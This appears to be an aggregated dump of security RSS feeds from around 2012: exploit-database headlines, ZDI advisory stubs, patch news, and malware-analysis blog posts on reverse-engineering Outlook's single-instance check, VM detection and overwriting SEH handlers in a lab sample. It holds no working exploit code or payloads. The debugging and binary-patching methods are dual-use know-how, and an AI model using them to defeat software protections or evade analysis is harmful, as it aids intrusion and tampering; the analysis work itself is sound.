==> Microsoft Internet Explorer 610 Mouse Tracking

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Microsoft Internet Explorer 610 Mouse Tracking Risk: Medium Text:Summary: Unprivileged attackers can track your system-wide mouse

==> Oracle MySQL For Microsoft Windows MOF Execution

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Oracle MySQL For Microsoft Windows MOF Execution Risk: Medium Text:## # This file is part of the Metasploit Framework and may be

==> Microsoft Internet Explorer 7 Denial Of Service

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Microsoft Internet Explorer 7 Denial Of Service Risk: Low Text: I want to warn you about Denial of Service vulnerabilities in Internet

==> remote - Microsoft windows remote desktop PoC C# Exploit

http://www.1337day.com/rss

==> dos / - Microsoft Internet Explorer 7 Denial Of Service

http://www.1337day.com/rss

==> remote - Oracle MySQL for Microsoft Windows MOF Execution Vulnerability

http://www.1337day.com/rss

==> Patch Tuesday: Five critical bulletins, Exchange Server fix expected

http://feeds.pheedo.com/tt/1323 In addition to Exchange Server, updates fix flaws in Internet Explorer, Microsoft Office and Microsoft Word. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> ZDI-CAN-1675: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'c1d2d9acc746ae45eeb477b97fa74688' was reported to the affected vendor on: 2012-11-21, 19 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1674: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 4.3 (AV:A/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-11-21, 19 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1672: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-11-21, 19 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1592: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'FuzzMyApp' was reported to the affected vendor on: 2012-11-21, 19 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1691: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2012-11-20, 20 days ago. The vendor is given until 2013-05-19 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1683: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Arthur Gerkis' was reported to the affected vendor on: 2012-11-20, 20 days ago. The vendor is given until 2013-05-19 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1604: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Tom Gallagher' and ' Microsoft & Paul Bates' and ' Microsoft' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will

==> ZDI-CAN-1602: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Tom Gallagher (Microsoft) & Paul Bates (Microsoft)' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the

==> ZDI-CAN-1655: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:M/Au:N/C:C/I:C/A:P) severity vulnerability discovered by 'Stephen Fewer of Harmony Security (www.harmonysecurity.com)' was reported to the affected vendor on: 2012-11-09, 31 days ago. The vendor is given until 2013-05-08 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1598: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:M/Au:N/C:C/I:C/A:P) severity vulnerability discovered by 'SkyLined' was reported to the affected vendor on: 2012-11-09, 31 days ago. The vendor is given until 2013-05-08 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1550: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:N/C:P/I:P/A:C) severity vulnerability discovered by 'Stephen Fewer of Harmony Security (www.harmonysecurity.com)' was reported to the affected vendor on: 2012-11-09, 31 days ago. The vendor is given until 2013-05-08 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1651: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2012-11-08, 32 days ago. The vendor is given until 2013-05-07 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1640: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:M/Au:N/C:C/I:C/A:P) severity vulnerability discovered by 'Omair (www.krash.in)' was reported to the affected vendor on: 2012-11-08, 32 days ago. The vendor is given until 2013-05-07 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1648: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:N/C:P/I:P/A:C) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-10-30, 41 days ago. The vendor is given until 2013-04-28 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1649: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:N/C:P/I:P/A:C) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-10-24, 47 days ago. The vendor is given until 2013-04-22 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1586: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-07-24, 139 days ago. The vendor is given until 2013-01-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1574: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-07-24, 139 days ago. The vendor is given until 2013-01-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1514: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:N/C:P/I:P/A:C) severity vulnerability discovered by 'Vitaliy Toropov' was reported to the affected vendor on: 2012-07-24, 139 days ago. The vendor is given until 2013-01-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1515: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:N/C:P/I:P/A:C) severity vulnerability discovered by 'Vitaliy Toropov' was reported to the affected vendor on: 2012-07-16, 147 days ago. The vendor is given until 2013-01-12 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1526: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-03-14, 271 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1525: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-03-14, 271 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1524: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-03-14, 271 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1523: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-03-14, 271 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1520: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-03-14, 271 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1281: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2011-05-25, 565 days ago. The vendor is given until 2011-11-21 to publish a fix or workaround. Once the vendor has created and tested a

==> Attention shoppers: Patch IE now before you shop online

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Today is the eleventh Patch Tuesday of 2012, but the first since the official launch of Windows 8 and Windows RT. There are six new security bulletinsa couple of which are particularly urgent, especially for anyone planning to do any online shopping this holiday season. There are four security bulletins rated as Critical, one Important, and one Moderate. The Critical security bulletins address issues with Internet Explorer, Windows kernel-mode drivers, the .NET framework, and flaws in Windows shell code that can allow remote exploits. The most crucial of the six security bulletins is the cumulative update for Internet ExplorerMS12-071. Andrew Storms, director of security operations for nCircle, declares, Topping our patch immediately list this month is the drive-by exploit affecting Internet Explorer 9. Its fairly obvious that Microsoft patched this bug in IE10 before its release; otherwise, we would have a bulletin affecting both IE9 and IE10. To read this article in full or to leave a comment, please click here

==> Operating System Choice Does Not Equal Security

http://hellnbak.wordpress.com/feed/ Yesterday while some of us in the USA were enjoying a day off Google made the news with this article in the Financial Timesstating that they are moving away from Microsoft Windows due to security concerns. My first reaction was to question why a company with as many smart brains as Google would make such [...]

==> Information Security Events For December

http://infosecevents.net/feed/ Here are information security events in North America this month: Conference on Fraud and Forensics : December 5 to 6 in Florida USA Bay Threat : December 7 to 8 in California, USA Microsoft BlueHat : December 13 to 14 in Washington, USA Bsides Seattle: December 15 in Seattle, [...]

==> Interesting Information Security Bits for 11/03/2008

http://infosecramblings.wordpress.com/feed/ Good afternoon everybody! I hope your day is going well. Here are today’s Interesting Information Security Bits from around the web. Microsoft: Trojans are huge and China is tops in browser exploits | Latest Security News – CNET News An interesting report has been put out by Microsoft that is worth a gander. Google patches [...]

==> Cross Your T's and Dot Your Filenames

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx I was developing some automation code recently and found that a process that I was injecting code into was crashing. At first I thought it was an error in my injected code, but when I looked at the crash-dump, I was amazed to see that the issue was in MFC42.DLL: MOV EBX,104 PUSH EBX LEA EAX,DWORD PTR SS:[EBP+szBuffer] PUSH EAX PUSH DWORD PTR DS:[ESI+6C] CALL DWORD PTR DS:[<&KERNEL32.GetModuleFileNameA> LEA EAX,DWORD PTR SS:[EBP+szBuffer] PUSH 2E PUSH EAX CALL DWORD PTR DS:[<&msvcrt._mbsrchr>] POP ECX POP ECX MOV DWORD PTR SS:[EBP-80],EAX MOV BYTE PTR DS:[EAX],0 <-- Crash! The code above is from MFC42.DLL, version 6.2.4131.0 from Windows XP SP2. It effectively does the following: GetModuleFileName(NULL, szBuffer, MAX_PATH); *(_mbsrchr(szBuffer, '.')) = 0; The function _mbsrchr(...) returns NULL if the character searched for is not found. This means that if there is no '.' in the current process's filename (which was the case for the file I was testing) then the highlighted line above will try to write the byte 0x00 to address 0x00000000, which will cause a crash. I figured that this was some obscure function from MFC42.DLL that most applications don't make use of, however, after a little digging it turns out that this code is in CWinApp::SetCurrentHandles(), which is called by AfxWinInit(...). From http://msdn2.microsoft.com/en-us/library/w04bs753(vs.80).aspx: "[AfxWinInit] is called by the MFC-supplied WinMain function, as part of the CWinApp initialization of a GUI-based application, to initialize MFC." In other words, almost every MFC GUI program executes the code snippet above! AAs surprised as I was by this, I figured that surely this had been fixed for Vista. Believe it or not, the same issue exists! Below is the code from MFC42.DLL version 6.6.8063.0 from Windows Vista Gold: PUSH 104 LEA EDX,DWORD PTR SS:[EBP+szBuffer] MOV [EDI+0C],ECX MOV EAX,DWORD PTR DS:[ESI+6C] PUSH EDX PUSH EAX CALL DWORD PTR DS:[<&KERNEL32.GetModuleFileNameA> TEST EAX,EAX JZ LOC_722F1484 CMP EAX,104 JZ LOC_722F1484 LEA ECX,[EBP+szBuffer] PUSH 2E PUSH ECX CALL __mbsrchr MOV EBX,EAX ADD ESP,8 TEST EBX,EBX MOV [EBP+VAR_310],EBX JZ LOC_7230DB7D ...
__mbsrchr: MOV EDI,EDI PUSH EBP MOV EBP,ESP POP EBP JMP DWORD PTR DS:[<&msvcrt._mbsrchr>]
LOC_7230DB7D: ... JMP DWORD PTR DS:[<&msvcrt.CxxThrowException>] While the code above checks for the lack of a '.' in the filename, it still throws an exception and causes a crash if there's no '.'. The good news is that it doesn't seem easy to accidentally execute an executable file without a '.' in the filename in Vista: C:\>copy c:\windows\notepad.exe notepad_exe 1 file(s) copied. C:\>notepad_exe 'notepad_exe' is not recognized as an internal or external command, operable program or batch file. C:\>start notepad_exe [This opens the "Open With" dialog box in Explorer instead of executing the file.] However, it is still possible to run non-dotted-files via API functions like CreateProcess(...) to cause the crash described above.

==> Refreshing the Taskbar Notification Area

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx I am working on an automation system that involves forcefully terminating a process that creates an icon in the Taskbar Notification Area (no, not the "system tray"). It is the responsibility of the process that creates an icon in the Taskbar Notification Area to remove the icon when the process exits, however, since I am using TerminateProcess(...) to remotely kill the process, the code to remove the icon never gets executed. As such, the icon remains in the Taskbar Notification Area until one moves the mouse cursor over the icon, at which point it disappears. Since this is an automation system that's being developed, this icon-creating process will get executed many times, and if left unchecked would end up leaving hundreds of icons in the Taskbar Notification Area (one icon per execution). That's bad. Despite my best Googling efforts ("refresh notification area", "redraw system tray", etc.), I wasn't able to find elegant code to solve this problem. I found some novel solutions, though. The most common suggestion was to use SetCursor(...) to drag the mouse cursor around the Taskbar Notification Area; while this works, it's an ugly hack and is actually quite slow. One of my "favorite" suggestions was to try to associate each icon in the Taskbar Notification Area with a process, then monitoring each process for termination, then deleting the icon once the given process terminates (talk about overkill... geeze). When a user moves the mouse over a "dead icon" in the Taskbar Notification Area, some window message must get sent to the window to cause it to say to itself, "hey, the mouse is over me, so let me see if the process that created this icon is still alive.... Oh, it's not? Let me remove the icon, then." I wanted to find what window message was causing that code to fire so that I could send that message to the window myself. I started up Microsoft Spy++ and saw the following information for the Taskbar Notification Area and its parent windows: A useful feature of Microsoft Spy++ is that it allows you to monitor window messages sent to a given window. I started monitoring the window messages getting sent to the "Notification Area" window without moving my mouse over the window and saw the following messages getting sent: * TB_BUTTONCOUNT * TB_GETBUTTONINFOW * TB_SETBUTTONINFOW * WM_PAINT * WM_ERASEBKGND The messages above clearly had nothing to do with me moving my mouse (since I wasn't moving my mouse over the window), so I configured Microsoft Spy++ to filter out those messages. Then I moved my mouse over the "dead icon" in question and saw the following messages: <00001> 00010056 S WM_NCHITTEST xPos:1491 yPos:1024 <00002> 00010056 R WM_NCHITTEST nHittest:HTCLIENT <00003> 00010056 S WM_SETCURSOR hwnd:00010056 nHittest:HTCLIENT wMouseMsg:WM_MOUSEMOVE <00004> 00010056 R WM_SETCURSOR fHaltProcessing:False <00005> 00010056 P WM_MOUSEMOVE fwKeys:0000 xPos:5 yPos:0 <00006> 00010056 S TB_HITTEST pptHitTest:022BFC18 <00007> 00010056 R TB_HITTEST iIndex:0 <00008> 00010056 S TB_DELETEBUTTON iButton:0 <00009> 00010056 R TB_DELETEBUTTON fSucceeded:True Aha! So either WM_NCHITTEST, WM_SETCURSOR, WM_MOUSEMOVE, or TB_HITTEST leads to the TB_DELETEBUTTON getting sent. After trying to send each window message manually with SendMessage(...), I found which window message was the catalyst: WM_MOUSEMOVE. With this new-found knowledge, I was able to whip up the following code to refresh the Taskbar Notification Area: #define FW(x,y) FindWindowEx(x, NULL, y, L"") void RefreshTaskbarNotificationArea() { HWND hNotificationArea; RECT r; GetClientRect( hNotificationArea = FindWindowEx( FW(FW(FW(NULL, L"Shell_TrayWnd"), L"TrayNotifyWnd"), L"SysPager"), NULL, L"ToolbarWindow32", L"Notification Area"), &r); for (LONG x = 0; x < r.right; x += 5) for (LONG y = 0; y < r.bottom; y += 5) SendMessage( hNotificationArea, WM_MOUSEMOVE, 0, (y << 16) + x); }

==> Stateless Bi-Directional Proxy

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx After submitting my first patent two years ago to the US Patent Office, it has finally been published online! You can read all the juicy details here and you can see diagrams here if you have a TIFF-renderer browser plug-in. This patent was from when I was still on the Firewall team at Microsoft, so it's network-related. The other patents of mine that should get published on the web over the next two years are from when I was on the Anti-Malware team at Microsoft, so they're related to binary analysis... in other words, even cooler than this one ;)

==> Investigating Outlook's Single-Instance Restriction (PART 1)

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx If you use Outlook and have multiple e-mail account profiles, you know how frustrating it is to have Outlook restrict you to a single running instance of Outlook per interactive login. For those of you not familiar with this "feature", here's the scoop: if you have one instance of Outlook running and then launch another instance, a new Outlook window is created in the context of the original instance, but you don't have the option to load another e-mail account profile. This is a pain because it requires you to close and restart Outlook each time you want to check a different e-mail account (assuming you have a separate profile for each account). Tim Mullen, a colleague of mine, had the ingenious idea of using RunAs to launch the second Outlook process as another user, to try to circumvent whatever "feature" was restricting Outlook to a single instance. "What a great idea!" I thought, and I kicked myself for not having thought of that myself! But when we tested it out, it had the same results as running a second instance of Outlook without RunAs; an extra window popped up for the first instance and we weren't given the option to load another profile. This piqued my interest and I wondered how Outlook was determining whether or not another instance was already running in the interactive login session. Typically when I'm trying to figure out how specific functionality works, I have an API function or string to use as my guide. For example, if I'm red-teaming a DRM solution and I get a message box saying, "Invalid license key." then I can search in the binary for that string to see what code references it, or I can set a breakpoint on the Windows API functions that display message boxes. However, for the case of Outlook here, I didn't have any strings to base my investigation on, and I didn't know which API function(s) were being used to check for the first instance. My first idea was to use an API logging tool like AutoDebug and run it once on the first Outlook session and once on the second Outlook session. I could then compare the API call logs and see where they differed, and then begin to investigate what caused them to differ at that point. However, I quickly found that API loggers such as AutoDebug are not suited for such a heavyweight program as Outlook (which imports a few thousand DLLs and a few million API functions (yes, I'm exaggerating, but it's still a lot)). My second idea was to use a conditional-branch logger, such as http://www.woodmann.com/ollystuph/Conditional_Branch_Logger_v1.0.zip and run the same comparison as described above. However, I didn't have that plugin downloaded at the time and I didn't have Internet access, so I had to make-do with what was already on my laptop. I used Process Explorer to watch what happens when the second instance of Outlook is launched. Sure enough, the process starts and then terminates. So I used OllyDbg to set a breakpoint on ExitProcess(...) to see if I could get a decent call-stack to see what code in Outlook led to the ExitProcess(...) call. The good news is that this allowed me to find the code that led to the process termination. The bad news is that it was called via _cexit(...) from ___tmainCRTStartup(...), so whatever code was detecting the first instance of Outlook was bailing out via ret's, not via a direct call to _cexit(...) or ExitProcess(...). This led me to the old trustworthy Trial-and-Error-with-F8 method. The idea is simple -- starting from the process's Entry Point, step over (F8 in OllyDbg) every function call until you see the desired results, at which point you know the code in question lies within that function call. For this case, I was watching for a new window to pop up in the context of the first Outlook instance; by that time the check would already have been made to see if another instance of Outlook was running. The great thing about this approach is that it's incredibly straight-forward. The downside is that if you're looking for functionality that doesn't happen near the beginning of the process execution, it can be very time consuming. Luckily though, this method worked like a charm for Outlook! I started the second Outlook process in OllyDbg, stepped over the first call and into a jump. No windows popped up yet, so I hadn't yet stepped over the call-in-question. I kept pressing F8 until I found that when I tried stepping over the call from address 0x2FD251C8 (this of course is specific to my computer; your addresses will differ), an Outlook window popped up in the context of the first Outlook process. So I set a breakpoint on 0x2FD251C8 and restarted my second Outlook process, this time stepping in (F7) to that call and pressing F8 again until I found the next call that opened the first Outlook window. I found that stepping over the call at address 0x2FD25228 caused the window to pop up, so I set a breakpoint on that address, restarted, stepped in, and continued this process for about two minutes until I found the following code: .text:30006BB7 push offset WindowName ; "Microsoft Outlook" .text:30006BBC push offset aMspim_wnd32 ; "mspim_wnd32" .text:30006BC1 mov [ebp+var_42C], edi .text:30006BC7 call ds:FindWindowA This looks like the culprit! During Outlook's initialization, it checks to see if a window named "Microsoft Outlook" with class name "mspim_wnd32" exists, and if so, it assumes that another instance is already running. To test this, I set the return value of FindWindowA(...) from the call above to NULL, and Outlook opened a full second instance of itself in a separate process, and allowed me to use a different account profile. This is a great example of where a very straight-forward reverse-engineering approach (Trial-and-Error-with-F8) can yield excellent results in just a few minutes given the right conditions. As a disclaimer, I don't know the reason that the Outlook development team decided to restrict Outlook to a single instance. Perhaps multiple instances will cause massive data corruption. In other words, if you're going to patch your Outlook executable so that it does allow for multiple instances, do so at your own risk! This post continued in Part 2.

==> Career Shift

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx Friday, April 20th will be my final day at Microsoft. I will be joining NGS in the coming weeks as a Principal Security Consultant. I've copied all of my old blog posts from http://blogs.msdn.com to http://www.malwareanalysis.com though unfortunately I was not able to save the old comments. My new personal e-mail address is jasonATmalwareanalysisDOTcom.

==> When the Red Pill is Hard to Swallow

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx I was looking at a malware sample last week that used a variation of Joanna Rutkowska's infamous Red Pill (http://invisiblethings.org/papers/redpill.html) to determine whether or not the malware was being run from inside a Virtual Machine. Based on the Red Pill concept, the guest OS's IDTR should be different from the host OS's IDTR. I was using Virtual PC to step through the malware sample in OllyDbg, with the goal of skipping the conditional-jump after SIDT led to the detection of my VM (see http://download.intel.com/design/Pentium4/manuals/25366720.pdf#page=275 for details on the SIDT instruction). You can imagine my surprise when SIDT returned 0x8003F400 as the base address of the IDT, which is the same base address of the IDT for my host Windows XP system! My first thought was that maybe the Virtual PC team figured out some ingenious way to make this happen via the Virtual Machine Additions add-on (see http://www.microsoft.com/technet/prodtechnol/virtualserver/2005/proddocs/vs_tr_components_additions.mspx?mfr=true). So I uninstalled Virtual Machine Additions, rebooted, and tried again. To my continued surprise, OllyDbg was still showing the host OS's IDTR when stepping through the SIDT instruction on my guest OS. After some more thinking, I thought, "maybe it has something to do with the fact that I'm single-stepping through SIDT in OllyDbg." To test this hypothesis, I set a breakpoint after the SIDT instruction, and ran the program from the start. Sure enough, SIDT returned 0xF9CB6440 as the base address of the IDT that time. The whole trick behind the Red Pill is that VMs don't typically have the opportunity to intercept SIDT since it's not a privileged instruction. However, when the Trap Flag is set (due to single-stepping), Virtual PC intercepts the int 1 interrupt and can execute the current instruction however it pleases; when it has the opportunity, it will use the host's IDTR for the SIDT instruction. Hopefully this knowledge will make the Red Pill a little easier for you to swallow (or spit-out if the Trap Flag is set).

==> Terms of the Trade

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx It is common to hear reverse engineers throw around the phrase, forty-thousand hex. To someone unfamiliar with reverse engineering or debugging in Windows, this phrase would probably be interpreted to mean the value 0x00040000. However, when reverse engineers say, forty-thousand hex, they are actually referring to the value 0x00400000. The value 0x00400000 is commonly seen when doing low-level work in Windows because this is the default base address of EXE files compiled by Microsofts C++ compiler. So why say forty-thousand hex instead of four-hundred-thousand hex? For starters, the former is easier to say (one less syllable) than the latter. But more importantly, hexadecimal numbers are usually grouped in sets of 2-digits (bytes) instead of in groups of 3-digits as in base 10. As such, a reverse engineer could read 0x00400000 as 0x00,40,00,00. Going from right-to-left, we have 00 in the tens place, 00 in the hundreds place, and 40 in the thousands place.

==> Circumventing custom SEH

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx I do most of my malware analysis statically, which is to say that I typically analyze malware by looking at a static disassembly of it as opposed to stepping through it in a debugger. However, sometimes I come across complicated or confusing code that would be easier to understand by walking through it in a debugger. I came across such an example the other day. An important branch decision was being made based on the result of a function that used a stack variable that IDA Pro couldn't represent in a simple way. Here's a snippet from the function: mov edx, [ebp+arg_0] add edx, 108h push edx I could have traced back in the disassembly to figure out what arg_0 + 108h was really pointing to (it turned out to be a global variable and arg_0 was set by the caller of the caller of this function), but I thought that I could save time by loading the target into a debugger and setting a breakpoint on the code above in order to determine what was actually being pushed. There was a problem, though. This malware launced other instances of itself, and setting a breakpoint on the code above in a debugger didn't work since the parent process never executed that code, only the bleep instances did. I could have set a breakpoint on CreateProcessA(...), forced it to load the bleep processes in a suspended state, attached a debugger to the bleep, then resumed them, but this was more trouble than it was worth. Instead, I opted for another method of attack. I configured my debugger for Just-In-Time (JIT) debugging (see http://support.microsoft.com/default.aspx?scid=kb;en-us;103861) so that I could attach to a crashed process via the Microsoft Application Error Reporting dialog box (also known as "Dr. Watson" -- see http://blogs.msdn.com/oldnewthing/archive/2005/08/10/449866.aspx). I then overwrote the code above with an int 3 and patched the file, with the expectation that after running the parent program that this would crash the bleep process, cause the Microsoft Application Error Reporting dialog box to pop up, and allow me to attach to the crashed bleep process. (It should be noted that this was done on an isolated network in a very controlled environment, and with all of our safeguards in place it was practically impossible for the modified malware to get out of our secure lab.) I saved the patched file and ran it, waiting eagerly for the Microsoft Application Error Reporting dialog box to appear. To my surprise, nothing happened. As it turned out, the program was using custom Structured Exception Handling (SEH) routines and because of this the int 3 exception was never passed to the operating system so the Microsoft Application Error Reporting dialog box never popped up. To remediate this, I changed my int 3 patch to the following: mov eax, fs:[0] mov [eax+4], 7c8399f3h int 3 This effectively overwrote the first exception handler in the SEH chain (see http://www.microsoft.com/msj/0197/exception/exception.aspx) with the default exception handler from kernel32.dll. The address of this handler is of course version-specific; in my case kernel32.dll was US English version 5.1.2600.2180. With this patch in place, the Microsoft Application Error Reporting dialog box popped up for the bleep process and I was able to attach my debugger and determine the value of arg_0 + 108h from the original code above.

==> FortiExplorer 2.0.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiExplorer 2.0.0 B1022 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * Mac OS X 10.6, MS Windows 7, MS Windows Vista, * MS Windows XP

==> FortiExplorer 1.9.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiExplorer 1.9.0 B1436 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * MS Windows 7, MS Windows Vista, MS Windows XP, * Mac OS X 10.6

==> How fair should Google Search be?

http://rgaucher.info/feed/rss2 This is the question that is raising in my mind right now... If you search for "Chrome" with the Google search engine, you will find their browser in the third position. Okay, it's not the first one, but i'm just wondering how possible is it for the brand-new-shiny-buggy browser to be that well referenced in a "classical" manner. Of course, this is under the google.com domain which (the main page) is PageRank 10, but well, I'm really wondering if this was a natural process or if something happened. First of, we can see that, using the search engine, the related pages of google.com/chrome are the different search engines... How come? Shouldn't it be more like Mozilla, Opera... Microsoft IE... ? For instance, if I look for the related pages of yahoo.com/finance I will find financial websites such as NASDAQ, etc. Anyway, if Google can control their search engine like that (and of course it's easy for them to do so...), what is the impact on the fairness of their search engine? The PR seems to be okay as long as there is not business like interference in the process...

==> Microsoft attempts legal action to disrupt some Zeus botnets

http://rss.techtarget.com/981.xml Legal and technical actions could disrupt some Zeus botnet operations by seizing command-and-control servers in Pennsylvania and Illinois. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Claims Based Identity: What does it Mean to You? (Part 3)

http://rss.windowsecurity.com/ In this article we're going to look at claims based identity going forward, in relation to Microsoft's soon-to-be-released operating systems (Windows 8 and Windows Server 2012) and server products (such as SharePoint 2013). We'll also look at claims based identity in Office 365.

==> Claims Based Identity: What does it Mean to You? (Part 2)

http://rss.windowsecurity.com/ In this Part 2 we'll start taking a look at how Microsoft is integrating claims based identity into its products and services.

==> Microsoft Internet Explorer 610 Mouse Tracking

http://securityreason.com/rss/SecurityAlert Topic: Microsoft Internet Explorer 610 Mouse Tracking Risk: Medium Text:Summary: Unprivileged attackers can track your system-wide mouse movements from any IE page, even when the page is unfocused o...

==> Oracle MySQL For Microsoft Windows MOF Execution

http://securityreason.com/rss/SecurityAlert Topic: Oracle MySQL For Microsoft Windows MOF Execution Risk: Medium Text:## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please...

==> Microsoft Internet Explorer 7 Denial Of Service

http://securityreason.com/rss/SecurityAlert Topic: Microsoft Internet Explorer 7 Denial Of Service Risk: Low Text: I want to warn you about Denial of Service vulnerabilities in Internet Explorer. I've found these DoS holes in IE7 already i...

==> Internet Explorer information leakage

